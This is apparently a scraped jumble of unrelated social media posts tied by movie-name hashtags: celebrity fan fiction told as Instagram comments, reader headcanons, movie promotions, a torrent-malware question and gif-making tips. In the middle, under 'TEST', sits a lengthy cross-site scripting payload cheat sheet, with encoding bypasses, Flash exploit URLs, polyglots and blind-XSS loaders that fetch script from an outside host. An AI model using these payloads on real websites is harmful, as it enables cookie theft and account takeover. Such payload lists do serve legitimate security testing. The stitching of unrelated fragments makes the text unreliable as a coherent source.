What’s Yours? Mine is “Terror of the Windy Werewolf “. I imagine him having a bad Taco Bell experience. #whatsyourmonstermovie #monstermovie #monsters #monster #movie #movienames #cultclassic #swarmm https://www.instagram.com/p/CjlpqEdvsmS/?igshid=NGJjMDIxMWI=

Click here download and watch the movie

co-star soulmate - t.c (part 3)

Face Claim: Dove Cameron

Part 1 - Part 2 - Part 3

yourusername

liked by noahschnapp,kendalljenner,percy and 4,325,116 others

yourusername surprise i guess?

view comments

ynfann WAIT WHAAAAAT

nicolaannepeltzbeckham this hair looks sooo good on you!

yourusername aww I’m flattered thank u bby 🖤

ynmybabyy OH MY GOD I TOTALLY WASN’T EXPECTING THIS

tchalamet I knew it would look perfect. But wow...

yourusername 🤭

yourfan9 😩😩

timmytim1 wait why did she changed her hair color?? it look so good tho

sweettea0 probably because her new film role 

pauline.chalamet wowza 😍

yourusername 😚💖

kissmeyn GUYS DID YOU SEE THIS

ynyn1 CRYING RN

timmymybaby Pauline and Y/N when , where ????

gigihadid my girl looks so good <3 

yourusername love you G!

more comments

tchalamet

liked by milliebobbybrown,selenagomez,harrystyles and 6,495,356 others

tchalamet we did something with voguemagazine

view comments

yourusername i loved doing that with you 💋

tchalamet we should do that more often 🕺🏻and i still have your rose btw

yourusername it’s yours now

tchalamet 🥹

yourfan2 are we going to pretend like we didn’t see this or..???????

timmytim6 IT’S HAPPENING GUYS 😭

voguemagazine 🌹♥️

liked by tchalamet

theweeknd loved the roses

liked by tchalamet

florencepugh yeah you look good but my girl slayed this

tchalamet who are you and what are you doing in my comment section

timotea0 You guys are sooooo cute

ynsbabygirl you two look so hot 🥵

kissmeyn ok but imagine doing a Vogue Shoot with Y/N L/N and Timothée Chalamet 🥲

more comments

the(moviename)

liked by timburton,tchalamet,aarontaylorjohnson and others

the(moviename) we love our girl Evelyn (yourusername), our hot detective❤️‍🔥

view comments

tchalamet and I thought I was the favorite star of this movie

the(moviename) we love you so much Timothée but this is her moment

tchalamet 🥲

yourusername ur my favorite tho 💋

tchalamet that’s enough for me ♥️

yourfan6 I WAS NOT READY FOR THIS

timotheeandyn They are literally flirting guys it confirmed they are dating 🤧

timmymyboy OK BUT I NEED THIS MOVIE LIKE RN 😩

pauline.chalamet hot mama 🔥

liked by tchalamet and yourusername

yourusername love you so much!

timotheefan6 CRYING SCREAMING THROWING UP

kissmeyn I’m so happy for her she looks so loved by Chalamets 🥹

liked by tchalamet and pauline.chalamet

kissmeyn WAIT THEY LIKED?!?!? DOES THAT MEAN YES?????

timmytimmy THEY LITERALLY CONFIRMED NOBODY CAN CONVINCE ME OTHERWISE 😭

more comments

enews

liked by zendaya,florencepugh and others

tagged: yourusername and tchalamet

enews our ship has sailed everyone! Actor Timothée Chalamet and Actress Y/N L/N spotted together in LA today! The close contact of the two did not go unnoticed by paparazzi. Link in bio for more!

view comments

yourfan6 LADYS AND GENTS THIS IS THE MOMENT YOU WAITED FOR 💥💥💥

user750 not zendaya and flo liking this 😭

timmyfan PARENTS 🙌🏻

blakelively my babies

vancityreynolds sorry honey but they love me more

timmyandyn OMG LOVE YOU GUYS

ynmybaby Blake and Ryan being parents to Y/N and Timothée >>>>>>

timotea0 you’re late tho. We already knew about them 🤝🏻

more comments

yourusername’s story

'Part-Time Friends' P1 Party Time is ALL the time - Damian / Jon x Reader

Reader with a LOT of time on their hands x Jon and Damian Headcanons   (Part 1)

GN reader / they them pronouns 

part 1 of 'Part-Time Friends'

~~

- Reader with Unlimited Free Time™ is a phone bill's worst enemy.

- CONSTANTLY updating, ranting, philosophizing, theories, deep dives, theories about the deep dives- anything

- (reader destroys their house's wifi at least once)

- Movies. Reader has seen them ALL. Sends "Top 10 best scenes in *moviename* with timestamps and locations

- Books. Reader has dozens of note pages about the author's secrets, details, and what it all means to novel's true themes. 

- Video Games. Something that Reader can get lost in for HOURS- It's perfect. Reader spams Jon and Damian with friend requests and "Play This Game With Me!!" requests. 

- Music. Reader makes specific playlists, hunts down every OST, AND can find you that one song you heard 5 seconds of at a random party but can only hum. 

- Reader honestly makes a whole ass YouTube channel or something, they have the time and they are a content machine 

- Reviews posted every 3 days 

- The boys come back from ANYTHING and find 50+/100+/sometimes 150+ messages, depending on how long they were gone and what Reader discovered during that time 

- Reader always has energy and always has something to share. 

- They are absolutely eating up all this attention, but sometimes it can get overwhelming 

- They don't have the time to read or respond to every single thing and when they do have some time their phone is constantly going off

- They have to mute Reader's number specifically because of just how distracting the notifications can be

- They used to text back almost immediately, then it became a little bit, then it became nothing at all

- This actually creates tensions between them and Reader, Reader understands they are busy for real reasons, but it can get so lonely talking to yourself 

- It can feel like your "friends" don't care or aren't putting as much effort 

- Reader confronts the boys about this and is worried all of it is 'too much' and 'too annoying'

- Damian gives it to Reader straight, it IS a lot and they DO NOT have time anymore, yes they stopped responding and it was because he just did not bother to check every last text anymore

- Jon lets Reader down a little easier, there is so much to read and even with superspeed powers his phone "wouldn't keep up" with him and that his family imposes a NO PHONES PAST *specifictime* rule- on top of the NO PHONES AT THE TABLE rule

- Reader is kind of annoyed, but the message is loud and clear

- Reader didn't know how they got so much free time on their hands anyway, but decides they should make a change 

- Reader decides to find something to busy themself for the future of their relationship and for their own relationship with their self worth 

Moviename?

USA 2018 Top 1000: no. 377

I'm watching the Official Title Reveal for Bond 25. It's No Time To Die. I love the name, as well as the interactive design work on the trailer. No Time To Die opens April 8, 2020, from MGM. #007 #jamesbond #movienames https://www.instagram.com/p/B1Zz5NEhILv/?igshid=qqjxb97oee16

As seen on Twitter from @gr33nfairy Too funny! Aw heck! This photo is from the Roxy in Dickson, Tennessee. #funnysigns #marquee #movienames #theatermarquee #tennessee (at Dickson, Tennessee) https://www.instagram.com/p/Bwf6mSIgMN1/?utm_source=ig_tumblr_share&igshid=3hc8kysdzuze

Dracula: The Original Living Vampire is available on PVOD

Which movie is this? Shraddha Kapoor and Tiger Jackie Shroff #shraddha #kapoor #shraddha #kapoor @shraddhakapoor #tiger #tigershroff @tigerjackieshroff #tigerjackieshroff #moviename #movienamecompitation #compitation # https://www.instagram.com/p/CBD_e-pFZjG/?igshid=fv78uwdmz3uq

Can you guess the movie from the hints given below? Drop your answer in comment box. #cada #cadaindia #quiz_post #weekly_post #Movie #moviename ##hints #stay_connected #follow_us https://www.cadaindia.com https://www.instagram.com/p/B-8_bdcD3kx/?igshid=5kok8xujol1x

https://music.apple.com/us/album/this-female-is-not-yet-rated/1402313761

🍎 Apple Music

Eve N' God: This Female Is Not Yet Rated by Cali Lili https://itunes.apple.com/us/movie/eve-n-god-this-female-is-not-yet-rated/id1447735793

Also Available on YouTube movies and music, Google play movies, and vimeo worldwide

🍎 movies Apple TV iTunes movies

If #men were called #boys as easily as we call a #woman a #girl #filmtitle #movietitle #filmname #moviename #name #dvd #dvdcover #themanwiththeironheart https://www.instagram.com/p/BhsGp3wBMYzcmiNTRHOPF9Hoig6jeTTudoSHqA0/?utm_source=ig_tumblr_share&igshid=199bnr7sznyt

hiya, i saw your neocities and its so cool! i was looking at your page abt torrents and it said not to use TPB or kickasstorrents cos of malware. basically i use both of these and was wondering if there was a way to check if i have any malware now lol! ty <3

Hello!

There’s not really a way, per se. You can’t even trust skulled users. Unless you download the thing and then shove it on virustotal, but that would be risky.

I guess downloading on a VM that is as isolated from your main PC as possible, and then running it on virustotal? I do that with certain programmes that I find suspicious.

I would avoid TPB and KT completely for software (because clean software can trigger antivirus engines, but depending on the source, is it clean?).

For movies, being extra careful regarding the extensions is the way to go (suspicious files could be, I dunno, [moviename].mkv but if you go to properties you could see it was actually [moviename].mkv.EXE, and the .mkv part was just part of the name). Or just use 133x, their content is very well curated (they banned YTX even before their dirty came to public).

I’m not much help honestly, but usually bigger torrent sites have more probability of having malware.

TEST

Basic payload <script>alert('XSS')</script> <scr<script>ipt>alert('XSS')</scr<script>ipt> "><script>alert('XSS')</script> "><script>alert(String.fromCharCode(88,83,83))</script> Img payload <img src=x onerror=alert('XSS');> <img src=x onerror=alert('XSS')// <img src=x onerror=alert(String.fromCharCode(88,83,83));> <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));> <img src=x:alert(alt) onerror=eval(src) alt=xss> "><img src=x onerror=alert('XSS');> "><img src=x onerror=alert(String.fromCharCode(88,83,83));> Svg payload <svg onload=alert(1)> <svg/onload=alert('XSS')> <svg onload=alert(1)// <svg/onload=alert(String.fromCharCode(88,83,83))> <svg id=alert(1) onload=eval(id)> "><svg/onload=alert(String.fromCharCode(88,83,83))> "><svg/onload=alert(/XSS/) Div payload <div onpointerover="alert(45)">MOVE HERE</div> <div onpointerdown="alert(45)">MOVE HERE</div> <div onpointerenter="alert(45)">MOVE HERE</div> <div onpointerleave="alert(45)">MOVE HERE</div> <div onpointermove="alert(45)">MOVE HERE</div> <div onpointerout="alert(45)">MOVE HERE</div> <div onpointerup="alert(45)">MOVE HERE</div> XSS for HTML5 <body onload=alert(/XSS/.source)> <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> <video/poster/onerror=alert(1)> <video><source onerror="javascript:alert(1)"> <video src=_ onloadstart="alert(1)"> <details/open/ontoggle="alert`1`"> <audio src onloadstart=alert(1)> <marquee onstart=alert(1)> <meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter> <body ontouchstart=alert(1)> // Triggers when a finger touch the screen <body ontouchend=alert(1)> // Triggers when a finger is removed from touch screen <body ontouchmove=alert(1)> // When a finger is dragged across the screen. XSS using script tag (external payload) <script src=14.rs> you can also specify an arbitratry payload with 14.rs/#payload e.g: 14.rs/#alert(document.domain) XSS in Hidden input <input type="hidden" accesskey="X" onclick="alert(1)"> Use CTRL+SHIFT+X to trigger the onclick event DOM XSS #"><img src=/ onerror=alert(2)> XSS in JS Context (payload without quote/double quote from @brutelogic -(confirm)(document.domain)// ; alert(1);// XSS URL URL/<svg onload=alert(1)> URL/<script>alert('XSS');// URL/<input autofocus onfocus=alert(1)> XSS in wrappers javascript and data URI XSS with javascript: javascript:prompt(1) %26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341 &#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41 We can encode the "javacript:" in Hex/Octal \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1) \u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1) \152\141\166\141\163\143\162\151\160\164\072alert(1) We can use a 'newline character' java%0ascript:alert(1) - LF (\n) java%09script:alert(1) - Horizontal tab (\t) java%0dscript:alert(1) - CR (\r) Using the escape character \j\av\a\s\cr\i\pt\:\a\l\ert\(1\) Using the newline and a comment // javascript://%0Aalert(1) javascript://anything%0D%0A%0D%0Awindow.alert(1) XSS with data: data:text/html,<script>alert(0)</script> data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ <script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script> XSS with vbscript: only IE vbscript:msgbox("XSS") XSS in files ** NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup. <name> <value><![CDATA[<script>confirm(document.domain)</script>]]></value> </name> XSS in XML <html> <head></head> <body> <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script> </body> </html> XSS in SVG <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.domain); </script> </svg> XSS in SVG (short) <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> <svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg> <svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg> <svg><title><![CDATA[</title><script>alert(3)</script>]]></svg> XSS in Markdown [a](javascript:prompt(document.cookie)) [a](j a v a s c r i p t:prompt(document.cookie)) [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) [a](javascript:window.onerror=alert;throw%201) XSS in SWF flash application Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);} IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1); more payloads in ./files XSS in SWF flash application flashmediaelement.swf?jsinitfunctio%gn=alert`1` flashmediaelement.swf?jsinitfunctio%25gn=alert(1) ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000 swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);// swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf plupload.flash.swf?%#target%g=alert&uid%g=XSS& moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true video-js.swf?readyFunction=alert(1) player.swf?playerready=alert(document.cookie) player.swf?tracecall=alert(document.cookie) banner.swf?clickTAG=javascript:alert(1);// io.swf?yid=\"));}catch(e){alert(1);}// video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29 bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4 flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}// phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}// XSS in CSS <!DOCTYPE html> <html> <head> <style> div { background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>"); background-color: #cccccc; } </style> </head> <body> <div>lol</div> </body> </html> XSS in PostMessage If the target origin is asterisk * the message can be sent to any domain has reference to the child page. <html> <body> <input type=button value="Click Me" id="btn"> </body> <script> document.getElementById('btn').onclick = function(e){ window.poc = window.open('http://www.redacted.com/#login'); setTimeout(function(){ window.poc.postMessage( { "sender": "accounts", "url": "javascript:confirm('XSS')", }, '*' ); }, 2000); } </script> </html> Blind XSS XSS Hunter Available at https://xsshunter.com/app XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service. "><script src=//yoursubdomain.xss.ht></script> javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursubdomain.xss.ht\';document.body.appendChild(a)') <script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//yoursubdomain.xss.ht");a.send();</script> <script>$.getScript("//yoursubdomain.xss.ht")</script> Other Blind XSS tools sleepy-puppy - Netflix bXSS - LewisArdern BlueLotus_XSSReceiver - FiresunCN ezXSS - ssl Blind XSS endpoint Contact forms Ticket support Referer Header Custom Site Analytics Administrative Panel logs Polyglot XSS Polyglot XSS - 0xsobky jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e Polyglot XSS - Ashar Javed ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> Polyglot XSS - Mathias Karlsson " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//

Your edits are amazing! I want to get better at making gifs and other edits. I posted a gif awhile back but it didn't get any notes, just about one. I'm a new blog and I don't have any followers and I don't have that much time to make connections or join networks. I was wondering how I can get some attention on my stuff, do you have any advice about this? I've been tagging the major networks names, but I'm not sure if they have or will even notice. I hope you don't mind I'm asking, thanks.

heyy thanks so much!! i would say one of the things you can try doing first is making edits/gifs of the more popular characters. they get searched more, so your stuff will likely be seen by more ppl. (if you’re making mcu edits, i find that bucky, peter parker and tony usually get the most notes) be careful with the tags tho.. i found out myself a while back that each post is limited to like 20??? tags.. which means any tag after the 20th tag won’t be linked to your post. so the order of the tags really matter -- put the more important ones in front! (e.g. #charactername or #moviename etc etc)

another thing (it doesn’t always make that big of a difference but it can still help a little) is posting at a certain time. this site is pretty american-dominated, so posting when it’s daytime over in the US might help your work get seen more.

but honestly it really helps most to have followers.. if you’re not already following other blogs or gif-makers you can try doing that too. you don’t have to chat with them or anything if you don’t wanna, just follow.. some might follow back. it’s gonna take time for you to gain attention, but you can use that time to also just keep working on your gifs cos i promise you, you’ll only get better and better:))